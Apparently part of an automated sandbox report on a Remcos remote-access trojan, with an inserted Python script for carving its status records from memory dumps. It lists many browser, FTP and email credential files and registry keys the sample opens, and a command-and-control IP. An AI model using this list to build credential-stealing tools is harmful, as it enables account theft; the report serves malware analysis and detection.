                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
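The memory strings above are Remcos status records whose fields are joined with the literal delimiter `|cmd|`, and the same record appears many times in the dump, mostly truncated at different points. The following is an added example, not code from this report, from Joe Sandbox or from Remcos, that carves such records out of a raw dump region (ASCII and UTF-16LE) and merges the indicators found across all fragments. The two sample strings are copied from the findings above; the dump buffer around them is constructed, and the field roles assigned by the classifier (C2 address, mutex/botnet id, version, OS, paths) are inferred from the values in this report rather than taken from any documentation of the format.

```python
"""
Carve Remcos-style '|cmd|'-delimited status strings out of a memory dump
region and pull indicators from them.

Added example; not Joe Sandbox or Remcos code. Field roles are inferred
from the values seen in this report, not documented.
"""
from __future__ import annotations

import re

DELIM = "|cmd|"

# Copied from the report's memory-string findings: one record that runs
# through the CPU-model field and one fragment truncated part-way, which is
# how overlapping copies of the same record show up in a process dump.
SAMPLE_STRINGS = [
    r"Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-",
    r"Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|",
]

# Constructed stand-in for a dump region: the two ASCII records plus one
# UTF-16LE fragment, separated by non-printable filler bytes.
SAMPLE_BLOB = (
    b"\x00\x00junk\xff" + SAMPLE_STRINGS[0].encode("ascii")
    + b"\x00\x00\x00\xfe" + SAMPLE_STRINGS[1].encode("ascii")
    + b"\x00\x00" + "Most|cmd|610930/user|cmd|GB|cmd|Windows".encode("utf-16-le")
    + b"\x00\x00"
)

ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
WINPATH = re.compile(r"^[A-Za-z]:\\")
VERSION = re.compile(r"^\d+\.\d+\.\d+(?: \w+)?$")  # e.g. "2.0.4 Pro"
WINDOWS_OS = re.compile(r"^Windows \d")

CATEGORIES = ("c2_ip", "mutex", "version", "os", "paths")


def find_cmd_strings(blob: bytes, min_delims: int = 3) -> list[str]:
    """Return printable runs (ASCII and UTF-16LE) holding >= min_delims delimiters."""
    found: list[str] = []
    for m in ASCII_RUN.finditer(blob):
        s = m.group(0).decode("ascii")
        if s.count(DELIM) >= min_delims:
            found.append(s)
    for m in WIDE_RUN.finditer(blob):
        s = m.group(0).decode("utf-16-le")
        if s.count(DELIM) >= min_delims:
            found.append(s)
    return found


def classify(fields: list[str]) -> dict[str, set[str]]:
    """Bucket fields by shape, so truncated records still yield what they hold.

    Empty fields, bare counters and the window title are deliberately ignored.
    """
    out: dict[str, set[str]] = {k: set() for k in CATEGORIES}
    for f in fields:
        if IPV4.match(f):
            out["c2_ip"].add(f)
        elif WINPATH.match(f):
            out["paths"].add(f)
        elif VERSION.match(f):
            out["version"].add(f)
        elif WINDOWS_OS.match(f):
            out["os"].add(f)
        elif f.startswith("Remcos-"):  # assumed to be the mutex / botnet id
            out["mutex"].add(f)
    return out


def remcos_indicators(blob: bytes) -> dict[str, list[str]]:
    """Union of indicators over every '|cmd|' fragment found in the blob."""
    merged: dict[str, set[str]] = {k: set() for k in CATEGORIES}
    for s in find_cmd_strings(blob):
        for k, v in classify(s.split(DELIM)).items():
            merged[k] |= v
    return {k: sorted(v) for k, v in merged.items()}


if __name__ == "__main__":
    for k, v in remcos_indicators(SAMPLE_BLOB).items():
        print(f"{k:8s} {v}")
```

Classification is by field shape rather than by position, so a fragment cut off anywhere still contributes whatever it contains, and the version, C2 address and mutex id come out the same whether they are read from the complete record or from a stub. The one positional guess, that the `Remcos-` token is the mutex or botnet id, is marked in the code; the window title (`Program Manager` here) is not extracted because nothing distinguishes it by shape.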

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Source: Yara match; File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_00406447
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Code function: \key3.db 11_2_004065DB
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\SiteDesigner\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\SmartFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\RhinoSoft.com\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\TurboFTP
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\BitKinex\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\BlazeFtp\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\LeapWare\LeapFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GPSoftware\Directory Opus\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\AceBIT
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\NetSarang\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FTPInfo\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FileZilla\filezilla.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\BitKinex\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\BlazeFtp\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\BitKinex\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FlashFXP\4\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\INSoftware\NovaFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FTP Explorer\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FTPGetter\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FTPInfo\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FTP Explorer\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\SmartFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\Frigate3\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FileZilla\sitemanager.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\TurboFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\Frigate3\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FTPRush\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FTPGetter\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FlashFXP\3\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\Estsoft\ALFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\ExpanDrive\drives.js
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\TurboFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\AceBIT\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\TurboFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\BlazeFtp\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FlashFXP\3\Sites.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\AceBIT\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\AceBIT\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Windows\32BitFtp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FlashFXP\4\Quick.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\NetSarang\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\3D-FTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FTP Explorer\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\NetSarang\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FTPRush\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FlashFXP\3\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\CuteFTP\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\FlashFXP\4\History.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Local\Frigate3\
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Windows\wcx_ftp.ini
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword5_2_0040EBA3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword5_2_0040EBA3

                    Remote Access Functionality

Source: file.exe | String found in binary or memory: Remcos_Mutex_Inj
